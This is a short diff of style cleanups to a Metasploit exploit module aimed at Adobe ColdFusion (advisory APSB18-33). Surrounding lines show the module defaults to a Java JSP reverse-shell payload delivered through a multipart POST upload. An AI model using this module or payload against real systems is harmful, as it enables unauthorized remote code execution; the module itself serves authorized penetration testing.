@@ -34,14 +34,12 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
         ],
         'Privileged' => false,
-        'Platform' => %w{linux win},
-        'Arch' => ARCH_JAVA,
         'Targets' => [
           [
             'Java Universal',
             {
               'Arch' => ARCH_JAVA,
-              'Platform' => %w{linux win},
+              'Platform' => %w[linux win],
               'Payload' => { 'DisableNops' => true },
               'DefaultOptions' => { 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' }
             }
@@ -80,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'version' => '1.1',
       'method' => 'POST',
       'ctype' => 'multipart/form-data; boundary=' + mime.bound,
-      'data' => post_str,
+      'data' => post_str
     })
 
     unless res && res.code == 200
